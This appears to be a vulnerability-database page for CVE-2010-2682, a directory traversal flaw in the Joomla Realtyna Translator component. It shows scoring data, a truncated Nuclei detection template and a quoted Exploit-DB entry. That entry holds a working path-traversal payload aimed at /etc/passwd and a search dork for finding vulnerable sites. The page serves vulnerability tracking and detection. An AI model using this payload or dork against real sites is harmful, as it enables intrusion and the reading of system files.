CVE-2010-2682
published 2010-07-12CVE-2010-2682: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and…
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
14.31%
96.2th percentile
Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realtyna | com_realtyna | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (2)
exploitdb·2010-06-24
CVE-2010-2682 Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (2)
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (2)
---
Joomla Component com_realtyna LFI vulnerability
[!]===========================================================================[!]
[~] Joomla Component com_realtyna LFI vulnerability
[~] Author : MISTERFRIBO
[~] Homepage : http://www.indonesianhacker.or.id
[~] Vendor: http://software.realtyna.com/
[~] Date : 23 june, 2010
[!]===========================================================================[!]
[^] dork : inurl:"joomla"
[!]===========================================================================[!]
[ Vulnerable File ]=-
http://[localhost]/index.php?option=com_realtyna&controller=[FRIBO]
[ XpL ]=-
../../../../../../../../../../../../../../../etc/passwd%00
[!]====================================
Nuclei
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2010-2682 [HIGH] Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-2682
info:
name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerabilit
http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txthttp://www.exploit-db.com/exploits/14017http://www.securityfocus.com/bid/39337https://exchange.xforce.ibmcloud.com/vulnerabilities/57647http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txthttp://www.exploit-db.com/exploits/14017http://www.securityfocus.com/bid/39337https://exchange.xforce.ibmcloud.com/vulnerabilities/57647
2010-07-12
Published